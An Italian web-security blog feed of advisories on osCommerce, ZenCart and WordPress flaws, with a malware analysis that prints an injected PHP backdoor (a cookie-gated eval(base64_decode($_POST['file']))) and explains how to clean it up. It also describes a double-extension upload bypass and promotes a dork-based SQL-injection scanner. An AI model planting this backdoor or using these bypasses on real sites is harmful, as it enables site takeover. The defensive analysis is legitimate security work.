Capn3m0 WebSecurity » security

[EXPLOIT] – osCommerce v3.0a5 Multiple Vulnerabilities

capn3m0 — Fri, 20 May 2011 19:14:17 +0000

Seguendo la scia di notizie degli ultimi tempi che han portato alla luce gravi vulnerabilità per le ultime versioni di OsCommerce (2.3.1) e ZenCart (1.3.9h) non poteva mancare all’appello anche l’ultimissima alpha release osCommerce 3.0.a5.

Per gli sviluppatori di OsCommerce è davverò un brutto periodo dato che in neanche un mese tutti le versioni attualmente “stabili” sono state bucate da molteplici vulnerabilità. Nella release specifica, che ripetiamo si tratta di una alpha, sono state individuate vulnerabilità di tipo Xss, Full Path Disclosure, Local File Inclusion e XSRF.

La Full Path Disclosure consiste nell’interrogare alcuni file del Template di OsCommerce che, andando in errore, mostrano a video la full path della loro posizione sul Server. Con questa sola informazione si può fare poco ma, anche in questo caso, se unita ad altri tipi di attacchi diventa una utile informazione. La XSS permette di iniettare codice JavaScript sfruttando una falla del file “products.php” mentre la Local File Inclusion consente di richiamare file presenti sul Server sfruttando la procedura di disinstallazione moduli del Cms che non verifica opportunamente i parametri passati e permette di accettare in input qualsiasi path raggiungibile.

Anche in questo caso c’è una falla più grave delle altre e a mio avviso è la XSRF che permette di inviare comandi all’applicativo senza che questi vengano verificati in alcun modo. Nel caso specifico sarà possibile creare un nuovo Admin sull’OsCommerce.

Basterà creare una pagina “.html” contenente il seguente codice:

Ovviamente dovrete sostituire i seguenti parametri:

> con il dominio del sito in cui si vuole creare l’account

con il nome utente del nuovo Admin

con la password da associare al nuovo Admin

Una volta creata la pagina richiamatela dal vostro Browser e cliccate su “Save”.

Se tutto è andato a buon fine accedendo all’url:

http:///admin/

potrete loggarvi come Admin con i dati appena inseriti.

Per informazioni dettagliate vi rimando al link del Dr. Alberto Fontanella autore dell’articolo.

osCommerce v3.0a5 [ Multiple Vulnerabilities ]

[EXPLOIT] – ZenCart 1.3.9h Multiple Vulnerabilities

capn3m0 — Fri, 20 May 2011 17:37:19 +0000

E’ ormai consuetudine che dopo l’individuazione di una nuova falla per OsCommerce a catena vengano individuate le stesse (o quasi) falle per ZenCart, altro noto Cms derivato dallo stesso OsCommerce.

La versione vulnerabile è l’ultima disponibile ossia la 1.3.9h e presenta vulnerabilità di vario tipo: Full Path Disclosure, Reflected XSS, Stored XSS e Arbitrary File Upload.

La vulnerabilità Full Path Disclosure permette, se la gestione degli errori è configurata per mostrarli a video, di conoscere la path assoluta dell’applicativo. Di per sé non è una falla che consente di effettuare alcun tipo di azione ma l’informazione che si ottiene potrebbe essere utile se unita ad attacchi che vanno a scrivere sul FileSystem o similari. Le due XSS, invece, non affliggono l’attuale 1.3.9h ma tutte le versioni precedenti. Le vulnerabilità sono localizzate nel campo “Quantità” del carrello che permette l‘injection di codice XSS e nell’Area Amministrativa “Location/Taxes”. Per quest’ultima, quindi, si presume che si abbia già l’accesso Admin.

L’ultima vulnerabilità, la più grave, riguarda invece il componente Banner (banner_manager.php) che, così come per OsCommerce, permette di effettuare l’upload di files che verranno salvati nella cartella “images”.

Per informazioni dettagliate vi rimando al link del Dr. Alberto Fontanella autore dell’articolo.

Zen Cart <= v.1.3.9h [ Multiple Vulnerabilities ]

XCode SQL Injection Scanner

capn3m0 — Tue, 15 Mar 2011 18:41:57 +0000

Breve videoguida all’utilizzo di XCode SQL Injection Scanner che permette di filtrare tramite Dork su Google eventuali siti vulnerabili a Sql Injection e, successivamente, lancia degli attacchi standard per verificare quali effettivamente risultano vulnerabili.

Un buon tool che permette di risparmiare tempo durante i pentest!

http://www.youtube.com/v/9d1bL5dN_KY?f=videos&app=youtube_gdata

Read the rest here:
XCode SQL Injection Scanner

Servizio delle Iene sulla Sicurezza Informatica di un Provider Italiano

capn3m0 — Mon, 01 Nov 2010 20:36:05 +0000

Il 28/10/2010 il programma televisivo Le Iene ha pubblicato un servizio dimostrativo sulla vulnerabilità dei sistemi informatici Italiani prendendo di mira un provider di caselle eMail gratuite. Il servizio dimostra come sia possibile accedere (con una piccola sostituzione di parametri) alla casella eMail di un estraneo e prenderne il completo controllo.

Read the original here:
Servizio delle Iene sulla Sicurezza Informatica di un Provider Italiano

La Polizia Postale si accorda con FaceBook per spiare i profili Italiani!

capn3m0 — Sun, 31 Oct 2010 14:22:40 +0000

Per una volta, l’Italia è più avanti degli Stati Uniti: come rivela L’Espresso , la Polizia Postale italiana ha appena stipulato un accordo con Facebook per poter accedere ai profili senza alcun mandato né rogatoria . Negli USA, al Congresso stanno da tempo litigando per approvare un decreto per permettere la stessa cosa. Noi l’abbiamo fatto senza battere ciglio.

Link:
La Polizia Postale si accorda con FaceBook per spiare i profili Italiani!

[EXPLOIT] – WordPress

capn3m0 — Sat, 14 Nov 2009 16:24:46 +0000

Ieri avevo dato notizia del rilascio della versione 2.8.6 di WordPress che risolveva due falle di sicurezza.

La notizia non era molto dettagliata poiché la vulnerabilità era stata annunciata molto genericamente come una vulnerabilità che permetteva di “aggirare le limitazioni ai nomi dei file in determinate configurazioni Apache”. Ora che è stata patchata, come spesso accade, iniziano a trovarsi maggiori informazioni e Proof of Concept.

In realtà la vulnerabilità permette di uploadare file bypassando il controllo della tipologia di file e permettendo, quindi, di uploadare script php e similari che possono poi essere richiamati da colui che attacca. Affligge tutte le versioni inferiori alla 2.8.5 (compresa) perciò provvedete quanto prima ad aggiornare il vostro blog.

La notizia era stata pubblicata l’11 Novembre scorso nella nota Mailing List Full Disclosure dove Dawid Golunski ha pubblicato un Proof Of Concept che potete leggere a questo link. Praticamente spiega che la verifica del file uploadato avviene confrontando l’estensione del file, estrapolata tramite una Regular Expression, con un array dei Mime Type permessi.

La Regular Expression, però, unita al fatto che i WebServer Apache (solamente in una particolare configurazione spiegata qui) consentono di creare file nel formato

filename.ext1.ext2

può essere bypassata uploadando un file contenente codice Php e assegnandogli un nome come il seguente:

phpinfo.php.jpg

In questo modo la verifica del file applicata da WordPress estrapolerebbe tramite la RegEx l’estensione “.jpg” e successivamente, verificandola con l’Array dei Mime Types ammessi, permetterebbe al file di essere uploadato scambiandolo per un’immagine.

Una volta fatto ciò chi attacca potrà richiamare lo script digitando la path standard dei file uploadati di WordPress ossia:

http:///wp-content/uploads/2009//phpinfo.php.jpg

Questa vulnerabilità, sebbene grave, non dovrebbe causare gravi danni visto che chi attaca deve essere un membro dello staff con privilegi di pubblicazione come era stato annunciato in occasione della 2.8.6.

Resta invece ancora sconosciuta la vulnerabilità di Cross Site Scripting scoperta da Benjamin Flesch sempre nella versione 2.8.5 di WordPress.

Eccovi alcuni link correlati:

Proof Of Concepts – WordPress <= 2.8.5 Unrestricted File Upload Arbitrary PHP Code Execution by Dawid Golunski

Vupen – WordPress Arbitrary File Upload and Cross Site Scripting Vulnerabilities

SecurityFocus – WordPress Unspecified Cross Site Scripting Vulnerability

Rilasciato WordPress 2.8.6 per correggere 2 falle di sicurezza!

capn3m0 — Fri, 13 Nov 2009 08:54:53 +0000

Dopo il tanto parlare degli ultimi giorni circa la possibilità che gli attacchi hacker avvenissero grazie a falle presenti in WordPress 2.8.5, rilasciato neanche un mese fa, è stata appena annunciata la security release 2.8.6 che contiene due importati fix di sicurezza.

La prima è una vulnerabilità del componente “Press This” (Pubblicalo in italiano) scoperta da Benjamin Flesch che permetteva di eseguire XSS (Cross Site Scripting) agli utenti registrati con privilegi di pubblicazione.

La seconda, invece, è stata scoperta da Dawid Golunski e consentiva di aggirare le limitazioni ai nomi dei file in determinate configurazioni Apache.

In attesa della versione WordPress 2.9 consiglio a tutti di provvedere ad aggiornare la propria versione tramite la funzione di “Aggiornamento Automatico” che verrà suggerita non appena entrerete nella vostra Bacheca.

[SECURITY] – 5 utili plugins per Firefox

capn3m0 — Tue, 17 Feb 2009 20:35:45 +0000

In questo articolo vi presenterò 5 utili Addons di Firefox che possono tornare utili in diverse situazioni e, in particolar modo, quando si vogliono testare vulnerabilità e similari di un applicativo web.

I plugins di cui parlerò sono i seguenti:

Web Developer Bar

Xss Me

Sql Inject Me

HackBar

Tamper Data

Questi 5 plugin torneranno molto utili quando proveremo ad effettuare le nostre prime analisi di sicurezza in quanto permettono di analizzare diversi aspetti di un sito web. Va detto che non sono programmi “per bucare” ma semplicemente dei test i cui risultati, se si hanno le giuste conoscenze, possono aiutare ad individuare falle o vulnerabilità in un dato sito.

18446744073709551615 – Un nuovo hack in arrivo?

capn3m0 — Mon, 09 Feb 2009 19:15:20 +0000

Negli ultimi giorni sto riscontrando un aumento di casi di hacking in cui apparentemente l’azione malevola consiste nel far visualizzare alla fine della home page della vittima il numero “18446744073709551615“.

Ricercando in rete utilizzando questo numero come chiave di ricerca si troveranno numerosi articoli/post che affermano che si tratta del massimo numero utilizzabile all’interno di un campo BIGINT in Php. Questo porterà l’ignaro utente ad impazzire alla ricerca della funzione all’interno del proprio sito che esegue calcoli che portano alla comparsa di questo numero. Tutto ciò sarà inutile!

In realtà questo numero viene visualizzato poiché le pagine “index.php” del proprio sito sono state hackerate inserendo al loro interno la seguente funzione che non altera il comportamento della pagina ma visualizza a pié di pagina il numero in oggetto.

La pagina modificata apparirà con il seguente codice:

1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20
< ?php ob_start("security_update"); //do not remove this line - important security update! <--- CODICE ORIGINALE DELLA PAGINA ---> ?> < ?php function security_update($buffer) { $update = '18446744073709551615'; if (stristr($buffer, ') !== FALSE) { return eregi_replace(', $update.', $buffer); } else { return $buffer.$update; } } ?>

Come potete vedere analizzando il codice la funzione “security_update” non fa altro che inserire tutto l’output originale della propria pagina in un buffer e successivamente accodare al buffer il valore “18446744073709551615“.

La domanda che sorge è: perché?

Sebbene stia tenendo d’occhio l’evolversi di questo hack non si è ancora individuato il motivo di tale azione. L’ipotesi che al momento appare essere la più veritiera è che venga utilizzato questo codice come “marcatore” dei siti “infetti” così da poterli facilmente trovare in una eventuale ricerca in rete.

In questo modo chi sta effettuando tali hack potrà individuare le proprie vittime e i siti per i quali conosce la falla di sicurezza che ha consentito di scrivere, per ora, il numero “18446744073709551615“.

Vedendo l’andamento delle ultime settimane ho assistito ad un’evoluzione dello script in quanto è stata aggiunta una nuova riga che potrebbe essere realmente dannosa per le vittime. Questo il codice nella sua nuova versione:

1 2 3
< ?php ob_start("security_update"); //do not remove this line - important security update! if(md5($_COOKIE['73043475c0893e30'])=="59fdd20854f4a2056c082cab53e64860"){ eval(base64_decode($_POST['file'])); exit; } ?>< ?php

Questo script ha in più un check su un cookie che, se verificato ($_COOKIE['73043475c0893e30'])==”59fdd20854f4a2056c082cab53e64860″), esegue una decodifica di un file criptato inviato via POST.

In questo modo l’hacker ha la possibilità di inviare file a tutti i domini che precedentemente aveva infettato e “marcato”.

Per ora non ho assistito ad azioni concrete che hanno sfruttato questa funzione “security_update()” ma, ovviamente, è naturale pensare che lo script e le sue evoluzioni siano vari step di un’azione mirata a raccogliere centinaia di siti infetti per effettuare in seguito un attacco di massa.

Come eliminarlo?

Per eliminarlo basta individuare tutte le pagine che mostrano il numero “18446744073709551615” e ripulirle dal codice di questo hack mostrato in precedenza.

Anche in questo caso il programma “PoweGrep” ci torna comodo permettendoci di effettuare una ricerca della stringa “18446744073709551615” su tutti i file del proprio sito (in locale).

Una volta individuate la pagine vanno rimosse queste righe dalla parte superiore della pagina:

1 2 3
< ?php ob_start("security_update"); //do not remove this line - important security update! if(md5($_COOKIE['73043475c0893e30'])=="59fdd20854f4a2056c082cab53e64860"){ eval(base64_decode($_POST['file'])); exit; } ?>

(la riga 3 non è presente in tutte le versioni)

e queste rige dalla fine:

1 2 3 4 5 6 7 8 9 10 11 12 13 14
< ?php function security_update($buffer) { $update = '18446744073709551615'; if (stristr($buffer, ') !== FALSE) { return eregi_replace(', $update.', $buffer); } else { return $buffer.$update; } } ?>

Possibilità di infezione

Non ho determinato, per ora, se l'infezione avviene tramite una vulnerabilità del proprio applicativo web o se invece avviene via Ftp sfruttando le credenziali del proprio Client Ftp.

In ambo i casi i consigli sono sempre gli stessi e fanno sempre bene:

1) Verificare presso siti di sicurezza come Secunia o SecurityFocus o Milw0rm eventuali nuove vulnerabilità dei propri applicativi/script/cms.

2) Eseguire periodicamente scansioni complete dei propri PC con software AntiMalware,AntiSpyware, etc. In particolare consiglio l'utilizzo di Malwarebytes' Anti-Malware che include tutte queste protezioni in un unica soluzione

Chiunque abbia informazioni al riguardo e volesse condividerle mi scriva all'indirizzo capn3m0@capn3m0.org

AGGIORNAMENTO DELL'8/11/2009: [HACK] – Cannot redeclare security_update(), alla fine è arrivato!